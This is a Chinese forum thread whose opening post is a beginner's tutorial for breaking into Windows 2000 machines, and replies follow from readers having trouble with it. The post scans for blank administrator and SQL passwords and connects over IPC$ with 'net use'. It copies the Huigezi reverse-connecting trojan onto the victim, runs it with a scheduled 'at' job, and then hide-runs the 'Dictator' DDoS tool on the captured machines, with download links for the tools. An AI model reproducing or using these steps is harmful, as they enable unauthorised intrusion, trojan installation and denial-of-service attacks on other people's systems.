新手请看：扫描+入侵+攻击

新手请看：扫描+入侵+攻击
这是我写的第一篇原创的帖子，我虽然很菜，但我把我知道拿出来与大家分享；这篇文章虽然很简单，但我觉得很实用。如果有什么不对的地方和好的建议请大家提出并指正。
一、扫描
扫描软件在网络上很多，功能也各一，在这里我推荐大家用X-scan2.0，下载地址：http://www.ttian.net/download/show.php?id=473
下载解压后，运行x-scan-gui，在“扫描模块”里只选“NT-server弱口令“和“SQL-server弱口令”这两项；在“扫描参数”里“基本设置”选项设置你要扫描的IP地址；在“端口相关设置”里“待检测端口”输入你要扫描的端口，在这里可以只扫描1433和3389这两个端口，其它的不变。一切准备好后就开始扫描，要不了多久就会出现结果。
二、入侵
在这里我们要用到一个木马，我推荐大家用“灰鸽子”，它是一个反弹性木马，具有自动上线连接的功能，当中木马机器的IP地址变了时也会自动上线连接。
下载地址：http://www.ttian.net/download/show.php?id=446。
下载解压后有p-client.exe（在自己的机器上运行的客户端程序）和server.exe（在肉鸡上运行的程序）。我们要让对方运行server.exe程序（记住这个程序不要在自己的机器上运行哟）。在让对方运行server.exe程序之前先配置server.exe程序（注意如果不配置这个程序即使对方运行了我们上传上去的server.exe程序，我们也不能和他连接）。具体配置server的方法：http://www.ttian.net/article/show.php?id=357
比如我们刚才扫描到一台IP为61.216.216.216的主机，Administrator密码为空。我们要利用刚才扫描得到的NT弱口令，再用IPC$管道来连接。具体如下：
1、先和对方主机建立连接，操作如下：
net use \\61.216.216.216\ipc$ "" /user:"administrator"
2、拷贝木马程序到对方的机器的C盘下，操作如下：
copy server.exe  \\61.216.216.216\c$
3、查看对方时间，操作如下：
net time \\61.216.216.216
4、假设对方的时间为下午1:23，让对方机器在13：25运行木马程序，操作如下：
at \\61.216.216.216 13:25 c:\server.exe（注意对方的时间为12小时制，我们用AT命令时要转换为24小时制，让对方运行木马的时间最好比对方机器的当前时间多几分钟）
5、查看木马程序是否运行，操作如下：
at \\61.216.216.216
如果清单为空，说明木马已运行了，这时我们可以在自己的机器上运行p-client.exe，刚才中了木马的机器就会自动来连接。
三、攻击
我写这篇文章的主要目的就是它。我们在这里要用到的一个攻击软件叫“独裁者”，它是一个采用的是分布式拒绝服务攻击的软件，下载下地址：http://www.leothreads.com/usr/25/25_18196.zip
“独裁者”的使用教程：
http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=17639&show=0
我们要让肉鸡运行“独裁者”的server.exe程序。
在木马“灰鸽子”里进入IP为61.216.216.216的主机的C盘，点右键“文件上传自”找到“独裁者”的server.exe点打开既可。当程序上传完后点刷新就可以看到我们刚才上传的server.exe文件了。右键点server.exe选“远程打开”“隐藏运行”，过一会我们就可以在
“独裁者”里加61.216.216.216这个ＩＰ了。
也许有人要问：“就是为什么我们要让对方对行木马，我们不可以直接在ＤＯＳ下上传“独裁者”的server.exe文件并上它运行就行了吗？
在这里我要说的就是“独裁者”没有自动连接的功能，如果肉鸡不是固定的ＩＰ，哪肉鸡就只能用一次，因为肉鸡原来哪个ＩＰ变了呀！这里的木马就有自动上线连接ＩＰ的功能，即使肉鸡的ＩＰ变了也能和连接。这样肉鸡就飞不了啦！嘿嘿！
其实这个的木马还有很多功能，比如可以用来作代理、查看对方屏幕、记录密码等，这就要你自己去慢慢探索吧。
以上全部在ＷＩＮ２０００里通过，如果大家有什么问题和好的建议请跟帖，谢谢！

我们还是缺少编程的！

那我问问为什么不用X-SCAN-V2.3。
现在最流行也是最好的扫描器下载地址是：cyhu.51.net

对不起~忘了看你的文章了~嘿嘿~~独裁者DDoS攻击器教程我有~和我来吧~
http://cyhu.51.net/cgi-bin/topic.cgi?forum=3&topic=362&show=0
当然~独载者从小凤居可以下载到~请大家自己去找吧~我没有那么多时间来找~
对不起了啊~时间有限啊~入侵教材写的不错~很好啊~

写的很好啊!!有空试试

怎么我运行不了啊?

我是照你说的做了。可是怎么设置端口啊。
我没有设，因为不知道怎么设。默认了。
他说不能和我扫描的IP的主机连接啊。
为什么？

回XUELANG一般这个SERVER。EXE指的是木马的服务端，你要让别人中你的木马，就是要想法让别人运行你给他的SERVER。EXE（可以自己命名），要是你运行了，呵呵，要是哪天别人找到你了，呵呵，你就成了别人的肉鸡了，如果你不介意做肉鸡的话就没所谓了，尽管点了试试看：）））））

回泡泡：我上面的IP是举的例子，不是真实的IP，就算是，也是过时了，你可以用“火炎焱燚”说的X-SCAN，是安全焦点出的扫描精品，“冰河”的作者黄鑫也参与了开发的，很好用，很傻瓜型的扫描软件。可以试试，要是还有不会，就提出来， 会有高手帮你的。。。呵呵
你说的端口不对？？用的是灰鸽子吗？？这个论坛里有使用说明，我好像就转过的，你找找看。。。。。

才扫描得到的NT弱口令，再用IPC$管道来连接。具体如下：
1、先和对方主机建立连接，操作如下：
net use \\61.216.216.216\ipc$ "" /user:"administrator
以上你说的是在那里进行呢？
我试过了啊，我和网吧的朋友合作的很好啊。但是对方如果不是朋友，应该怎么办。我扫描到了IP地址，但是连不上主机啊。为什么。怎么才可以把木马放到对方的机器上呢？能不能说的详细一点。我没有看明白你上面说的。还有NT的弱口令我也没有找到啊。要不请你发一个详细一点的介绍你给我们介绍的这些工具的网页。谢谢了

编程的文章，由我来发，我以前也发过。你们给删了！！气死我了。现在又要我再打一次！！
我会搞一点点简单的程序开发！！

用流光好还是你推荐的这个好？

为什么用不了啊